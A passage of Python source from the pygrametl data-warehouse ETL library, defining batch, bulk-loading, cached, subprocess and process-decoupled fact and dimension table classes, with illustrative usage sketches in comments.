- compare: a flag deciding if measure values from a fact that was
looked up are compared to those in the given row. If True and
differences are found, a ValueError is raised. Default: False
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if not res:
self.insert(row, namemapping)
return False
elif compare:
for m in self.measures:
if m in row and row[m] != res.get(m):
raise ValueError(
"The existing fact has different measure values")
return True
def endload(self):
"""Finalize the load."""
pass
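# A hypothetical sketch of fact loading. The table and attribute names are
# assumptions; each row must already hold the dimension key values (e.g.,
# found with the dimensions' ensure methods) and the measures.
#
#     facttbl = FactTable(
#         name='sales',
#         keyrefs=['dateid', 'productid', 'storeid'],
#         measures=['price', 'quantity'])
#     facttbl.insert({'dateid': 1, 'productid': 42, 'storeid': 7,
#                     'price': 10, 'quantity': 3})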
class BatchFactTable(FactTable):
"""A class for accessing a fact table in the DW. This class performs
performs insertions in batches.
"""
def __init__(self, name, keyrefs, measures=(), batchsize=10000,
targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- batchsize: an int deciding how many insert operations should be done
in one batch. Default: 10000
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
FactTable.__init__(self,
name=name,
keyrefs=keyrefs,
measures=measures,
targetconnection=targetconnection)
self.__batchsize = batchsize
self.__batch = []
def _before_insert(self, row, namemapping):
self.__batch.append(pygrametl.project(self.all, row, namemapping))
if len(self.__batch) == self.__batchsize:
self.__insertnow()
return True # signal that we did something
def _before_lookup(self, keyvalues, namemapping):
self.__insertnow()
def endload(self):
"""Finalize the load."""
self.__insertnow()
def __insertnow(self):
if self.__batch:
self.targetconnection.executemany(self.insertsql, self.__batch)
self.__batch = []
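# A hypothetical sketch of batched fact loading. The arguments are the same
# as for FactTable plus batchsize; inserted rows are buffered in memory and
# only sent to the DB with executemany when batchsize rows have accumulated,
# when a lookup is performed, or when endload is called at the end of the
# load. The names below are assumptions.
#
#     facttbl = BatchFactTable(
#         name='sales',
#         keyrefs=['dateid', 'productid', 'storeid'],
#         measures=['price', 'quantity'],
#         batchsize=50000)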
class _BaseBulkloadable(object):
"""Common functionality for bulkloadable tables"""
def __init__(self, name, atts, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the table in the DW
- atts: a sequence of the bulkloadable tables' attribute names
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and shows the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are given
to _BaseBulkloadable.__init__ as described here. The argument
"tempdest" can, however, be 1) a string with a filename or
2) a file object. This is determined by the usefilename argument to
_BaseBulkloadable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object.
Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadable tables that should
be loaded before this instance does bulkloading (e.g., if
a fact table has foreign keys to some bulkloaded dimension tables).
Default: ()
"""
self.name = name
self.atts = atts
self.__close = False
if tempdest is None:
self.__close = True
self.__namedtempfile = tempfile.NamedTemporaryFile()
tempdest = self.__namedtempfile.file
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.bulkloader = bulkloader
self.tempdest = tempdest
self.bulksize = bulksize
self.usefilename = usefilename
if encoding is not None:
self.encoding = encoding
else:
self.encoding = locale.getpreferredencoding()
self.dependson = dependson
if version_info[0] == 2:
# Python 2: We ignore the specified encoding
self._tobytes = lambda data, encoding: str(data)
else:
# Python 3: We make _tobytes use the specified encoding:
self._tobytes = lambda data, encoding: bytes(data, encoding)
self.__count = 0
self.__ready = True
def __preparetempfile(self):
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
self.__ready = True
def _insertwithnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
rawdata = [row[namemapping.get(att) or att] for att in self.atts]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.__count += 1
self.tempdest.write(
self._tobytes(
"%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
data = [str(row[namemapping.get(att) or att]) for att in self.atts]
self.__count += 1
self.tempdest.write(
self._tobytes("%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _bulkloadnow(self):
if self.__count == 0:
return
for b in self.dependson:
if hasattr(b, '_bulkloadnow'):
b._bulkloadnow()
self.tempdest.flush()
self.tempdest.seek(0)
self.bulkloader(self.name, self.atts,
self.fieldsep, self.rowsep, self.nullsubst,
self.usefilename and self.__namedtempfile.name or
self.tempdest)
self.tempdest.seek(0)
self.tempdest.truncate(0)
self.__count = 0
def endload(self):
"""Finalize the load."""
self._bulkloadnow()
if self.__close:
try:
self.__namedtempfile.close()
except OSError:
pass # may happen if the instance was decoupled
self.__ready = False
def _decoupled(self):
if self.__close:
# We need to make a private tempfile
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
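# A hypothetical bulkloader callback for PostgreSQL/psycopg2 matching the
# signature described in _BaseBulkloadable.__init__. It is only a sketch:
# `pgconn` is assumed to be an existing psycopg2 connection, nullsubst is
# assumed to be set to a string (copy_from requires that), and usefilename is
# assumed to be False so that tempdest is a file object.
#
#     def pgbulkloader(name, atts, fieldsep, rowsep, nullsubst, tempdest):
#         cursor = pgconn.cursor()
#         cursor.copy_from(file=tempdest, table=name, sep=fieldsep,
#                          null=nullsubst, columns=atts)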
class BulkFactTable(_BaseBulkloadable):
"""Class for addition of facts to a fact table. Reads are not supported. """
def __init__(self, name, keyrefs, measures, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is the combination of keyrefs and measures
(i.e., a list of the names of the columns to insert values into)
and shows the order in which the attribute values appear in the
temporary file. The rest of the arguments are similar to those
arguments with identical names that are given to
BulkFactTable.__init__ as described here. The argument "tempdest"
can, however, be 1) a string with a filename or 2) a file
object. This is determined by the usefilename argument to
BulkFactTable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process
(for example, when the BulkFactTable is wrapped by a
DecoupledFactTable and invokes the bulkloader on a shared
connection wrapper). Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadable tables that should
be bulkloaded before this instance does bulkloading (e.g., if
the fact table has foreign keys to some bulk-loaded dimension
table). Default: ()
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[k for k in keyrefs] + [m for m in measures],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _insertwithoutnulls from __init__
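# A hypothetical sketch combining BulkFactTable with the pgbulkloader callback
# sketched after _BaseBulkloadable above. All names are assumptions.
#
#     facttbl = BulkFactTable(
#         name='sales',
#         keyrefs=['dateid', 'productid', 'storeid'],
#         measures=['price', 'quantity'],
#         bulkloader=pgbulkloader,
#         bulksize=500000,
#         nullsubst='\\N')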
class BulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike CachedBulkDimension, this class always caches all dimension data.
The class caches all dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
Calls of lookup and ensure will only use the cache and do not invoke
any database operations. It is also possible to use the update and
getbyvals methods, but calls of these will invoke the bulkloader first
(and performance can degrade). If the dimension table's full rows
are cached (by setting __init__'s cachefullrows argument to True), a
call of getbykey will only use the cache, but if cachefullrows==False
(which is the default), the bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=(), targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadable tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=0,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=False,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if not self.cachefullrows:
self._bulkloadnow()
return CachedDimension.getbykey(self, keyvalue)
# else we do cache full rows and all rows are cached...
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
else:
# Do not look in the DB; we cache everything
return self.emptyrow.copy()
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self._insert(row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
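# A hypothetical sketch of a BulkDimension, which keeps all members cached in
# memory and writes new members to the DB via the bulkloader callback (here
# the pgbulkloader sketched earlier). Names are assumptions; note that
# getbyvals and update force a bulk load before touching the database.
#
#     productdim = BulkDimension(
#         name='product',
#         key='productid',
#         attributes=['pname', 'category'],
#         lookupatts=['pname'],
#         bulkloader=pgbulkloader,
#         nullsubst='\\N')
#     key = productdim.ensure({'pname': 'Beer', 'category': 'Drinks'})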
class CachedBulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike BulkDimension, the cache size is configurable and lookups may
thus lead to database operations.
The class caches dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
It is also possible to use the update and getbyvals methods, but calls
of these will invoke the bulkloader first (and performance can
degrade). If the dimension table's full rows are cached (by setting
    __init__'s cachefullrows argument to True), a call of getbykey will only
use the cache, but if cachefullrows==False (which is the default), the
bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
usefetchfirst=False, cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=5000, cachesize=10000,
usefilename=False, encoding=None, dependson=(),
targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
          a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
          clause is used when prefill is True. Depending on the DBMS and
          DB driver used, this can give significant savings wrt. time and
memory. Not all DBMSs support this clause yet. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 5000
- cachesize: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
        - dependson: a sequence of other bulkloadable tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=cachesize,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
self.__localcache = {}
self.__localkeys = {}
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
if searchtuple in self.__localcache:
return self.__localcache[searchtuple][self.key]
return CachedDimension._before_lookup(self, row, namemapping)
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def _bulkloadnow(self):
emptydict = {}
for key, row in self.__localkeys.items():
self._after_insert(row, emptydict, key)
self.__localcache.clear()
self.__localkeys.clear()
_BaseBulkloadable._bulkloadnow(self)
return
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
if keyvalue in self.__localkeys:
return self.__localkeys[keyvalue].copy()
return CachedDimension.getbykey(self, keyvalue)
def lookup(self, row, namemapping={}):
return CachedDimension.lookup(self, row, namemapping=namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
row = pygrametl.copy(row, **namemapping)
searchtuple = tuple([row[n] for n in self.lookupatts])
res = self._before_insert(row, {})
if res is not None:
return res
if row.get(self.key) is None:
keyval = self.idfinder(row, {})
row[self.key] = keyval
else:
keyval = row[self.key]
if searchtuple in self.__localcache:
return self.__localcache[searchtuple]
self._insert(row, {})
self.__localcache[searchtuple] = row
self.__localkeys[keyval] = row
return keyval
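# --- Illustrative sketch (not part of pygrametl): building a bulkloader
# callback with the signature the bulk-loading tables above expect. The
# psycopg2 connection passed in is an assumption made for this example; any
# PEP249 driver with an equivalent bulk-copy facility could be used instead.
def _example_make_pgcopy_bulkloader(pgconn):
    def bulkloader(name, atts, fieldsep, rowsep, nullsubst, tempdest):
        # copy_from streams the temporary file straight into the table; the
        # columns argument keeps the file's field order and the table's
        # attribute order aligned.
        curs = pgconn.cursor()
        curs.copy_from(file=tempdest, table=name, sep=fieldsep,
                       null=str(nullsubst), columns=atts)
    return bulkloader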
class SubprocessFactTable(object):
"""Class for addition of facts to a subprocess.
The subprocess can, e.g., be a logger or bulkloader. Reads are not
supported.
Note that a created instance can not be used when endload() has been
called (and endload() is called from pygrametl.commit()).
"""
def __init__(self, keyrefs, measures, executable,
initcommand=None, endcommand=None, terminateafter=-1,
fieldsep='\t', rowsep='\n', nullsubst=None,
buffersize=16384):
r"""Arguments:
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- executable: The subprocess to start.
- initcommand: If not None, this command is written to the
subprocess before any data.
- endcommand: If not None, this command is written to the subprocess
after all data has been written.
- terminateafter: If greater than or equal to 0, the subprocess
is terminated after this amount of seconds after the pipe to
the subprocess is closed.
- fieldsep: a string used to separate fields in the output
          sent to the subprocess. Default: '\t'
- rowsep: a string used to separate rows in the output sent to the
subprocess. Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
"""
self.all = [k for k in keyrefs] + [m for m in measures]
self.keyrefs = keyrefs
self.measures = measures
self.endcommand = endcommand
self.terminateafter = terminateafter
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.process = Popen(executable, bufsize=buffersize, shell=True,
stdin=PIPE)
self.pipe = self.process.stdin
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
if initcommand is not None:
self.pipe.write(initcommand)
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
        pass # Is set to _insertwithnulls or _insertwithoutnulls from __init__
def _insertwithnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
rawdata = [row[namemapping.get(att) or att] for att in self.all]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
data = [str(row[namemapping.get(att) or att]) for att in self.all]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def endload(self):
"""Finalize the load."""
if self.endcommand is not None:
self.pipe.write(self.endcommand)
self.pipe.close()
if self.terminateafter >= 0:
sleep(self.terminateafter)
self.process.terminate()
else:
self.process.wait()
def _decoupling(self):
"""Raise a TypeError to avoid decoupling (does not happen in Jython)"""
import sys
if sys.platform.startswith('java'):
# In Jython, we use threads for decoupling and we do not have
# to prevent it.
return
raise TypeError('A SubProcessFactTable cannot be decoupled')
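# --- Illustrative sketch (not part of pygrametl): a SubprocessFactTable that
# pipes tab-separated fact rows through gzip into a file. The key/measure
# names and the shell command are hypothetical; any program reading rows from
# stdin would be driven the same way.
def _example_subprocess_facttable():
    return SubprocessFactTable(keyrefs=('dateid', 'productid', 'storeid'),
                               measures=('price',),
                               executable='gzip -c > facts.csv.gz')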
class DecoupledDimension(pygrametl.parallel.Decoupled):
"""A Dimension-like class that enables parallelism by executing all
operations on a given Dimension in a separate, dedicated process
(that Dimension is said to be "decoupled").
"""
def __init__(self, dim, returnvalues=True, consumes=(), attstoconsume=(),
batchsize=500, queuesize=200):
"""Arguments:
- dim: the Dimension object to use in a separate process
- returnvalues: decides if return values from method calls on dim
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=dim,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=
tuple([(0, a) for a in
attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if dim in pygrametl._alltables:
pygrametl._alltables.remove(dim) # We add self instead...
pygrametl._alltables.append(self)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled Dimension in the separate process"""
return self._enqueue('lookup', row, namemapping)
def getbykey(self, keyvalue):
"""Invoke getbykey on the decoupled Dimension in the separate process"""
return self._enqueue('getbykey', keyvalue)
    def getbyvals(self, row, namemapping={}):
        "Invoke getbyvals on the decoupled Dimension in the separate process"
return self._enqueue('getbyvals', row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled Dimension in the separate process"""
return self._enqueue('insert', row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled Dimension in the separate process"""
return self._enqueue('ensure', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled Dimension in the separate process and
return when all waiting method calls have been executed
"""
# first add 'endload' to the batch and then send the batch
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def scdensure(self, row, namemapping={}):
"Invoke scdensure on the decoupled Dimension in the separate process"
if hasattr(self._obj, 'scdensure'):
return self._enqueue('scdensure', row, namemapping)
else:
raise AttributeError('The object does not support scdensure')
class DecoupledFactTable(pygrametl.parallel.Decoupled):
"""A FactTable-like class that enables parallelism by executing all
operations on a given FactTable in a separate, dedicated process
(that FactTable is said to be "decoupled").
"""
def __init__(self, facttbl, returnvalues=True, consumes=(),
attstoconsume=(), batchsize=500, queuesize=200):
"""Arguments:
- facttbl: the FactTable object to use in a separate process
- returnvalues: decides if return values from method calls on facttbl
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=facttbl,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=tuple([(0,
a) for a in attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if facttbl in pygrametl._alltables:
pygrametl._alltables.remove(facttbl) # We add self instead
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled FactTable in the separate process"""
return self._enqueue('insert', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled FactTable in the separate process and
return when all waiting method calls have been executed
"""
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'lookup'):
return self._enqueue('lookup', row, namemapping)
else:
raise AttributeError('The object does not support lookup')
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'ensure'):
return self._enqueue('ensure', row, namemapping)
else:
raise AttributeError('The object does not support ensure')
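# --- Illustrative sketch (not part of pygrametl): a decoupled dimension feeding
# a decoupled fact table. The productdim/facttbl arguments and the attribute
# name 'productid' are hypothetical; ensure() on the decoupled dimension
# returns a FutureResult which the fact table's process resolves because it
# consumes the decoupled dimension.
def _example_decoupled_load(productdim, facttbl, rows):
    dim = DecoupledDimension(productdim, returnvalues=True)
    fact = DecoupledFactTable(facttbl, returnvalues=False,
                              consumes=[dim], attstoconsume=('productid',))
    for row in rows:
        row['productid'] = dim.ensure(row)
        fact.insert(row)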
#######
class BasePartitioner(object):
"""A base class for partitioning between several parts.
See also DimensionPartitioner and FactTablePartitioner.
"""
def __init__(self, parts):
self.parts = list(parts)
self.__nextpart = 0
    def getparts(self):
        """Return (a copy of) the parts the partitioner works on"""
        return self.parts[:]
def addpart(self, part):
"""Add a part"""
self.parts.append(part)
    def droppart(self, part=None):
        """Drop a part. If an argument is given, it must be a part of the
        partitioner and it will then be removed. If no argument is given,
        the last part is removed."""
if part is None:
self.parts.pop()
